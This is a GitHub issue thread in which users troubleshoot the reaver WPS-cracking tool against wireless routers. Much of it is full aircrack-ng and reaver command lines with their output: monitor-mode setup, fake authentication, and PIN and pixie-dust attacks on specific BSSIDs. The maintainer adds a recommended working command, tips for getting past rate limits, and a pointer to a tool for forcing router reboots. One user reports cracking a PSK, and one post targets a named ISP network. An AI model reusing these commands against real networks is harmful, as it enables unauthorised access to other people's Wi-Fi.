t6x/reaver-wps-fork-t6x #347: Reaver not working - giving either *Receive timeout occured* or send packet called from resend_last_packet() send.c:161

AdonisPro, 2021-10-05:
HI All,

I am badly stuck with the issues mentioned in the subject line and earnestly looking for help from this community. I am trying to crack my home Router where-in WPS is enabled and no PBC. Below is my steps of activities and the corresponding o/p:

root@kali:~/Downloads/reaver_1.6.1# airmon-ng start wlan0 3

PHY Interface Driver Chipset

phy1 wlan0 8188eu Realtek Semiconductor Corp. RTL8188EUS 802.11n Wireless Network Adapter
(monitor mode enabled)

The above o/p shows the make model of my wireless driver and below o/p shows that the packet injtion is supporte and happening via my wirelss adapter.

root@kali:~/Downloads/reaver_1.6.1# aireplay-ng --test wlan0
06:16:05 Trying broadcast probe requests...
06:16:05 Injection is working!
06:16:06 Found 4 APs

06:16:06 Trying directed probe requests...
06:16:07 D8:1E:DD:4E:E8:01 - channel: 6 - 'fool'
06:16:07 Ping (min/avg/max): 3.810ms/13.998ms/26.666ms Power: -23.73
06:16:07 30/30: 100%

06:16:07 xx:xx:xx:xx:xx:xx - channel: 3 - 'blabla'
06:16:07 Ping (min/avg/max): 2.639ms/7.964ms/30.632ms Power: -59.67
06:16:07 30/30: 100%

06:16:07 BC:0F:9A:18:9C:1C - channel: 1 - 'Ghost'
06:16:08 Ping (min/avg/max): 3.856ms/10.894ms/59.543ms Power: -71.31
06:16:08 29/30: 96%

06:16:08 84:D8:1B:14:90:A0 - channel: 3 - 'Pointer'
06:16:09 Ping (min/avg/max): 2.970ms/17.456ms/125.373ms Power: -93.07
06:16:09 28/30: 93%

Terminal 1:
root@kali:~# aireplay-ng --fakeauth 30 -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan0
05:52:56 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 3

05:52:56 Sending Authentication Request (Open System) [ACK]
05:52:56 Authentication successful
05:52:56 Sending Association Request [ACK]
05:52:56 Association successful :-) (AID: 1)

05:53:11 Sending keep-alive packet
05:53:26 Sending Authentication Request (Open System) [ACK]
05:53:26 Authentication successful
05:53:26 Sending Association Request [ACK]
05:53:26 Association successful :-) (AID: 1)

05:53:41 Sending keep-alive packet
05:53:56 Sending Authentication Request (Open System) [ACK]
05:53:56 Authentication successful
05:53:56 Sending Association Request [ACK]
05:53:56 Association successful :-) (AID: 1)

05:54:11 Sending keep-alive packet
05:54:26 Sending Authentication Request (Open System) [ACK]
05:54:26 Authentication successful
05:54:26 Sending Association Request [ACK]
05:54:26 Association successful :-) (AID: 1)

Terminal 2:
Below i am using the installed reaver which is of version 1.6.6 and below is the o/p or error we can say
root@kali:~# reaver --bssid 98:DA:C4:9F:FC:88 --channel 3 --interface wlan0 -vvv --no-associate --no-nack -d 30 -L --dh-small -e TP-Link_FC88 -K 1

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com

[+] Switching wlan0 to channel 3
[+] Waiting for beacon from 98:DA:C4:9F:FC:88
[+] Received beacon from 98:DA:C4:9F:FC:88
[+] Vendor: RalinkTe
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
[+] Associated with 98:DA:C4:9F:FC:88 (ESSID: TP-Link_FC88)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161

Now in many places in web i have seen experts talking about using version 1.6.1 and hence i managed to get the version and executed the same and below is the o/p:

reaver version 1.6.1-
root@kali:~/Downloads/reaver_1.6.1# ./reaver --bssid 98:DA:C4:9F:FC:88 --channel 3 --interface wlan0 -vvv --no-associate --no-nack -d 30 -L --dh-small -e TP-Link_FC88 -K 1

Reaver v1.6.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com

[+] Switching wlan0 to channel 3
[+] Waiting for beacon from 98:DA:C4:9F:FC:88
[+] Associated with 98:DA:C4:9F:FC:88 (ESSID: TP-Link_FC88)
[+] Trying pin "12345670"
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred

Initially for version 1.6.6 i was receiving AP rate limit and i overcome that by using --no-nack flag. BUt am stuck at this step and can't proceed further.

Earnestly requesting the goodself of yours to please help me so that i can proceed.

rofl0r, 2021-10-05:
check https://github.com/t6x/reaver-wps-fork-t6x/wiki/Troubleshooting

also --dh-small is deprecated and external association using aircrack shouldnt be needed anymore.
1.6.6 is superior to 1.6.1 in every aspect.

AdonisPro, 2021-10-05:
Firstly Thanks a ton for your reply, am thankful to you.  Actually i have been breaking my head for last 3 days to solve this issue and from different sources i have found different solutions which i have collated to build the command with different flags. But since you are suggesting, i'll remove --dh-small option. Also, henceforth, will ignore external association. 

I am looking into the troubleshooting part. 

Considering your busy schedule, just a humble request, incase i further reach out to you via this issue or whatever, i'd expect your kind hand of help.

Regards

rofl0r, 2021-10-05:
the usual command line for success is `reaver -i wlan1 -b xxxx -N -vvv -g 1 <-p PIN or -K>` - if you need -L the ap is likely already locked, and i've never seen -L making it work in such a case. as wps vulns were plenty in the past, many ISPs have now opted to either turn WPS off completely or to simply stop transactions in process.

AdonisPro, 2021-10-05:
Hi @rofl0r 

Thanks for the details and well noted. ;It will help me learn things easily. But i have tried with the command below some times back:
reaver --bssid xx:xx:xx:xx:xx:xx --channel 3 --interface wlan0 -vvv --no-associate --no-nack -d 30 -L --dh-small -e blabla -K 1
 and it worked like a charm. I got the wps AND psk cracked within a min. 

I am in an awe and cant figure out why it didn't work earlier. I have not made any changes in the env. Just omitted the --dh-small as you suggested in your prev comment.

Would request you to please enlighten me if possible about any thing that i am missing to understand or any inconsistency issue.

Mehrad141, 2022-06-08:
I got this same error and my wifi adapter is alpha 036ACH and i want to install reaver 1.6.1 how can i download it cause i cant find it repository. I will be grateful to help me.

rofl0r, 2022-12-12:
provide info about your wifi adapter, and a packet capture (made with e.g. wireshark), so we can look into why FCS checksum error is thrown.

Legionarul21, 2022-12-12:
> provide info about your wifi adapter, and a packet capture (made with e.g. wireshark), so we can look into why FCS checksum error is thrown.

I have TP-link WN722n rtl8188eus.
As far as I can see, I no longer have the problem with FCS, but it always appears: receive timeout occurred.
[image]

rofl0r, 2022-12-12:
> [!] AP seems to have WPS turned off

here's why it's not working. most modern APs use WPS 2.0 that locks permanently after 3 failed attempts, or they just turn WPS off.

Legionarul21, 2022-12-12:
> > [!] AP seems to have WPS turned off
> 
> here's why it's not working. most modern APs use WPS 2.0 that locks permanently after 3 failed attempts, or they just turn WPS off.

And nothing can be done?

rofl0r, 2022-12-13:
> And nothing can be done?

maybe rebooting the router. i heard there's an attack tool that might be able to force a router to reboot remotely, https://github.com/aircrack-ng/mdk3 but i'm not familiar with it.

Silentkiller987, 2023-03-13:
> check https://github.com/t6x/reaver-wps-fork-t6x/wiki/Troubleshooting
> 
> also --dh-small is deprecated and external association using aircrack shouldnt be needed anymore. 1.6.6 is superior to 1.6.1 in every aspect.

aireplay-ng -9 -a FC:22:F4:2C:A4:54 wlan0 -e FC:22:F4:2C:A4:54  
19:25:27  Waiting for beacon frame (BSSID: FC:22:F4:2C:A4:54) on channel 11
For the given BSSID "FC:22:F4:2C:A4:54", there is an ESSID mismatch!
Found ESSID "Airtel_9660552532" vs. specified ESSID "FC:22:F4:2C:A4:54"
Using the given one, double check it to be sure its correct!
19:25:28  Trying broadcast probe requests...
19:25:28  Injection is working!
19:25:29  Found 1 AP 

19:25:29  Trying directed probe requests...
19:25:29  FC:22:F4:2C:A4:54 - channel: 11 - 'FC:22:F4:2C:A4:54'
19:25:30  Ping (min/avg/max): 3.010ms/5.367ms/9.006ms Power: -72.87
19:25:30  30/30: 100%

closed 2023-03-14 by rofl0r